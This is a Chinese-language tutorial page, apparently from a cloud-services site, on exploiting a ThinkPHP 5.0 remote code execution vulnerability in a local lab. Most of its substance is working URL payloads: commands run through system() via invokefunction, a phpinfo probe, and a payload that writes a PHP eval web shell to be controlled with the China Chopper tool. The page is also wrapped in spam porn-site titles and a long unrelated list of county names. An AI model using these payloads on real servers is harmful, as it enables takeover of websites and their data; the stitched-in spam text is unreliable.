91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何實現ThinkPHP5.0遠程代碼執行

發布時間:2021-10-18 16:02:32 來源:億速云 閱讀:199 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何實現ThinkPHP5.0遠程代碼執行,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

ThinkPHP是一款國內流行的開源PHP框架,某些版本可能存在遠程代碼執行漏洞,攻擊者可向緩存文件內寫入PHP代碼,導致遠程代碼執行。雖然該漏洞利用需要有幾個前提條件,但鑒于國內使用ThinkPHP框架的站點數量之多,該漏洞還是存在一定的影響范圍.

受影響的版本包括5.05.1

下載ThinkPHP5.0.22版本源碼程序,放在PHPStudy運行目錄下并訪問

如何實現ThinkPHP5.0遠程代碼執行

1.將Payload添加進入URL地址后面進行利用

Payload1:system函數遠程命令執行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

如何實現ThinkPHP5.0遠程代碼執行

Payload2:phpinfo函數查看phpinfo()的信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

如何實現ThinkPHP5.0遠程代碼執行

2.利用Payload寫入shell,并使用菜刀進行連接

Payload1:寫入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

**注意:**需要對特殊字符使用^轉義(cmd環境下轉義方式),windows環境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行.

菜刀連接

如何實現ThinkPHP5.0遠程代碼執行

以上就是如何實現ThinkPHP5.0遠程代碼執行,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

岳普湖县| 阿坝县| 宜君县| 遂溪县| 甘孜县| 武冈市| 柳河县| 铅山县| 酒泉市| 大冶市| 平罗县| 东乡县| 洱源县| 阿拉善右旗| 新和县| 繁昌县| 理塘县| 遵义市| 合水县| 页游| 肇州县| 米易县| 静宁县| 清徐县| 鹤岗市| 鹤山市| 衡南县| 平原县| 齐河县| 绍兴市| 富锦市| 山丹县| 鲁山县| 页游| 富宁县| 溧阳市| 且末县| 犍为县| 醴陵市| 长春市| 卢氏县|